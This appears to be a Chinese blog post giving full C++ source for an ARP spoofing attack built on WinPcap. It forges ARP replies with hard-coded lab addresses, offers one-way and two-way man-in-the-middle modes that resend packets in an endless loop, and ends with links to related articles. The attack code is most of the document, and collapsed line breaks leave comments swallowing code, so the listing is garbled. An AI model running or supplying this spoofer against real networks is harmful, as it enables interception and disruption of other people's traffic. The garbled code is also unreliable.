使用winpcap实现ARP欺骗代码
实验过程见 winpcap实现ARP欺骗攻击实验过程

#define _WINSOCK_DEPRECATED_NO_WARNINGS
#define _CRT_SECURE_NO_WARNINGS
#define HAVE_REMOTE
#define WIN32
#include <iostream>
#include "pcap.h"
#pragma comment(lib,"wpcap")using namespace std;//对齐
#pragma pack (1)//MAC地址
struct mac_address {u_char byte[6];
};struct eth_head {mac_address destMAC;     //目的MAC地址 6字节  mac_address sourceMAC;      //源MAC地址 6字节  u_short     type;           //帧类型, 0x0806是ARP帧的类型值
};struct arp_head
{unsigned short  hardwareType;       //硬件类型unsigned short  protocolType;       //协议类型unsigned char   hardwareAddLen;     //硬件地址长度unsigned char   protocolAddLen;     //协议地址长度unsigned short  op;                 //op,操作类型mac_address     sourceMAC;          //发送方MAC地址unsigned long   sourceIP;           //发送方IP地址mac_address     destMAC;            //目的MAC地址unsigned long   destIP;             //目的IP地址
};struct arp_packet
{eth_head apt_eth_head;arp_head apt_arp_head;
};#pragma pack ()//单向欺骗
int mod1(pcap_t* adhandle)
{//伪造ARP Relpy包//目标信息string DstIP = "192.168.243.80";u_char DstMAC[6] = { 0x00,0x0C,0x29,0xB0,0xD7,0x94 };//源信息string SrcIP = "192.168.243.33";u_char SrcMAC[6] = { 0x7C,0xB2,0x7D,0xD4,0xE9,0xDC };   //假MAC地址(攻击机MAC)eth_head eh;        //以太网头arp_head ah;        //ARP头for (int i = 0; i < 6; i++)eh.destMAC.byte[i] = DstMAC[i];for (int i = 0; i < 6; i++)eh.sourceMAC.byte[i] = SrcMAC[i];eh.type = htons(0x0806);        //ARP类型ah.hardwareType = htons(0x0001);ah.protocolType = htons(0x0800);ah.hardwareAddLen = 0x06;ah.protocolAddLen = 0x04;ah.op = htons(0x0002);ah.sourceMAC = eh.sourceMAC;ah.sourceIP = inet_addr(SrcIP.c_str());ah.destMAC = eh.destMAC;ah.destIP = inet_addr(DstIP.c_str());arp_packet* apt = NULL;unsigned char sendbuffer[80];memset(sendbuffer, 0, sizeof(sendbuffer));apt = (arp_packet*)sendbuffer;apt->apt_eth_head = eh;apt->apt_arp_head = ah;while (true){if (pcap_sendpacket(adhandle, sendbuffer, sizeof(sendbuffer)) != 0){cout << "packets send ERROR!" << endl;return -1;}cout << "SEND SUCCESS" << endl;Sleep(100);}return 0;
}//双向欺骗
int mod2(pcap_t* adhandle)
{//主机Astring A_IP = "192.168.243.80";u_char A_MAC[6] = { 0x00,0x0C,0x29,0xB0,0xD7,0x94 };//主机Bstring B_IP = "192.168.243.53";u_char B_MAC[6] = { 0x00,0x0C,0x29,0x64,0x03,0x99 };//攻击机Cstring C_IP = "";u_char C_MAC[6] = { 0x7C,0xB2,0x7D,0xD4,0xE9,0xDC };//发送给A的包eth_head eh_A;        //以太网头arp_head ah_A;        //ARP头for (int i = 0; i < 6; i++)eh_A.destMAC.byte[i] = A_MAC[i];for (int i = 0; i < 6; i++)eh_A.sourceMAC.byte[i] = C_MAC[i];eh_A.type = htons(0x0806);        //ARP类型ah_A.hardwareType = htons(0x0001);ah_A.protocolType = htons(0x0800);ah_A.hardwareAddLen = 0x06;ah_A.protocolAddLen = 0x04;ah_A.op = htons(0x0002);ah_A.sourceMAC = eh_A.sourceMAC;ah_A.sourceIP = inet_addr(B_IP.c_str());ah_A.destMAC = eh_A.destMAC;ah_A.destIP = inet_addr(A_IP.c_str());//发送给B的包eth_head eh_B;        //以太网头arp_head ah_B;        //ARP头for (int i = 0; i < 6; i++)eh_B.destMAC.byte[i] = B_MAC[i];for (int i = 0; i < 6; i++)eh_B.sourceMAC.byte[i] = C_MAC[i];eh_B.type = htons(0x0806);        //ARP类型ah_B.hardwareType = htons(0x0001);ah_B.protocolType = htons(0x0800);ah_B.hardwareAddLen = 0x06;ah_B.protocolAddLen = 0x04;ah_B.op = htons(0x0002);ah_B.sourceMAC = eh_B.sourceMAC;ah_B.sourceIP = inet_addr(A_IP.c_str());ah_B.destMAC = eh_B.destMAC;ah_B.destIP = inet_addr(B_IP.c_str());arp_packet* apt_A = NULL;unsigned char sendbuffer_A[80];memset(sendbuffer_A, 0, sizeof(sendbuffer_A));apt_A = (arp_packet*)sendbuffer_A;apt_A->apt_eth_head = eh_A;apt_A->apt_arp_head = ah_A;arp_packet* apt_B = NULL;unsigned char sendbuffer_B[80];memset(sendbuffer_B, 0, sizeof(sendbuffer_B));apt_B = (arp_packet*)sendbuffer_B;apt_B->apt_eth_head = eh_B;apt_B->apt_arp_head = ah_B;while (true){if (pcap_sendpacket(adhandle, sendbuffer_A, sizeof(sendbuffer_A)) != 0){cout << "packets send ERROR!    A" << endl;return -1;}if (pcap_sendpacket(adhandle, sendbuffer_B, sizeof(sendbuffer_B)) != 0){cout << "packets send ERROR!    B" << endl;return -1;}cout << "SEND SUCCESS" << endl;Sleep(100);}return 0;
}int  main()
{pcap_if_t* alldevs;pcap_if_t* d;char errbuf[PCAP_ERRBUF_SIZE];//获取设备列表if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1){cout << "Error in pacp_findalldevs_ex:" << errbuf << endl;return -1;}int i = 0;for (d = alldevs; d != NULL; d = d->next){cout << endl;cout << i++ << " " << d->name << endl;if (d->description)cout << " <" << d->description << ">" << endl;elsecout << " <No description>" << endl;}if (i == 0){cout << "No interfaces found!" << endl;return -1;}while (true){int n;cout << "\nchose interface:";cin >> n;if (n == -1){pcap_freealldevs(alldevs);return 0;}if (n < 0 || n >= i)continue;for (d = alldevs, i = 0; i < n; d = d->next, i++);cout << n << " " << d->name << endl;if (d->description)cout << " <" << d->description << ">" << endl;elsecout << " <No description>" << endl;break;}//打开与网络适配器绑定的设备pcap_t* adhandle;if ((adhandle = pcap_open(d->name, 65535, PCAP_OPENFLAG_PROMISCUOUS, 1000, NULL, errbuf)) == NULL){cout << "ERROR in open" << endl;pcap_freealldevs(alldevs);return -1;}pcap_freealldevs(alldevs);//单向还是双向欺骗//mod1(adhandle);mod2(adhandle);return 0;
}

winpcap实现ARP欺骗攻击相关推荐

  1. 网络安全实验之《ARP欺骗攻击》实验报告

    一.实验目的 (1)课上实验(ARP欺骗攻击工具实验):运行WinArpAttacker或Ettercap(二选一),通过WireShark等抓包工具,捕获ARP欺骗攻击的数据包,分析ARP攻击的原理 ...

  2. ARP欺骗攻击的检测和防御

    以太网构建由 1500 个字节的块组成的数据帧.每个以太网数据帧头包括源 MAC 地址和 目的 MAC 地址.建造以太网数据帧,必须从 IP 数据包中开始.但在构建过程中,以太网并 不知道目标机器的M ...

  3. 模拟ARP欺骗攻击与防护

    为保证网络环境的安全,模拟ARP欺骗在eNSP模拟器+VMware虚拟机上构建网络环境. 一:ARP欺骗攻击 1.准备环境:华为eNSP模拟器+VMware虚拟机上创建kali服务器 2.在虚拟机上打 ...

  4. 如何发动一次ARP欺骗攻击

    免责协议:本文整个实验过程都在虚拟机中进行,且本材料仅供交流学习使用,严禁用于违法犯罪. 1.环境部署:服务器 windows2008 客户机  windows10 攻击机  kali 都在同一网络环 ...

  5. ARP欺骗攻击原理及其防御

    一.概述 1.ARP协议 地址解析协议,将IP地址转换为对应的mac地址,属链路层协议 数据包分为: 请求包(广播):本机IP地址.mac地址+目标主机IP地址 应答包(单播):本机IP地址.mac地 ...

  6. H3C防止同网段arp欺骗攻击配置

    防止同网段ARP欺骗攻击的配置方法 二层交换机实现仿冒网关的ARP防攻击:一.组网需求:1. 二层交换机阻止网络用户仿冒网关IP的ARP攻击二.组网图: 图1二层交换机防ARP攻击组网S3552P是三 ...

  7. 3-wireshark网络安全分析——ARP欺骗攻击

    目录 1. 中间人攻击 2. ARP欺骗 3. ARP欺骗过程分析 4. Wireshark专家系统分析 5. 如何防御ARP欺骗 ARP协议可参考:https://blog.csdn.net/qq_ ...

  8. 从菜鸟到高手,CMD命令行了解arp欺骗攻击的原理

    arp的中文释义是地址解析协议,全英文 address resolution protocol,是一个将局域网IP地址映射到网卡物理地址(MAC)的工作协议.或许你应该听说过或者遇到过arp欺骗攻击, ...

  9. 防火墙 | ARP欺骗攻击

    防火墙 | ARP欺骗攻击 每天一个入狱小技巧!!! ARP欺骗攻击利用的原理 主机接收到一个应答包之后,并不会验证自己是否发送过对应的arp请求包,也不会验证这个arp请求包是否可信,而是直接用应答 ...

最新文章

  1. MySQL数据库(十) 一一 数据库的导出和导入
  2. 年月日_C++计算输入的年月日是这一年的第几天
  3. Hive安装MySql
  4. python里边的单词都表示什么_Python:只保留字符串中的单词,每个单词都在newlin上...
  5. java session 生命周期_java之hibernate之session中对象的生命周期
  6. HAProxy + Keepalived实现MySQL的高可用负载均衡
  7. [线筛五连]线筛欧拉函数
  8. Flutter IM 极光
  9. Java 查询Word是否存在关键字,并保留word路径到txt
  10. Apache Tomcat漏洞总结
  11. 字节跳动笔试题-前端(互娱)
  12. ahk写入excel单元格_输出excel数据到GUI 获取excel所有Sheet及字段 Autohotkey
  13. 流放之路进去后显示无法连接登入服务器,流放之路此账号目前无法登录游戏
  14. 实记JLink-V8刷固件方法
  15. 《IOS疯狂讲义》雪花飘飘效果实现
  16. 2020人工智能教育创新排行榜
  17. SSIST 2016 参会总结--day2
  18. python SQLite数据库基本操作
  19. 编程英语:常见代码错误 error 语句学习(15)
  20. 小波从此逝,江海寄余生,不但是文坛巨擘还是不世出的编程奇才,王小波离世25周年

热门文章

  1. 单点登录和第三方登录
  2. ISME | 拟南芥次生代谢物调控微生物组介导的线虫入侵
  3. 818专业课【考经】—《信号系统》之章节概要:第七章 傅里叶变换的应用
  4. 迁移pg之后org.postgresql.util.PSQLException: ERROR: could not find left sibling of block 4594 in index..
  5. 【Go语言刷题篇】Go完结篇|函数、结构体、接口、错误入门学习
  6. 前端和数据库学习的链接
  7. STM32F103 通过SD卡IAP升级程序,带MD5校验,(带源码)可在实际项目中使用
  8. Stardock Start11 v1.36 Windows开始菜单增强工具直装版
  9. php 禁止模拟手机,php防止模拟请求 - bengozhong的个人空间 - OSCHINA - 中文开源技术交流社区...
  10. Python基础——类与对象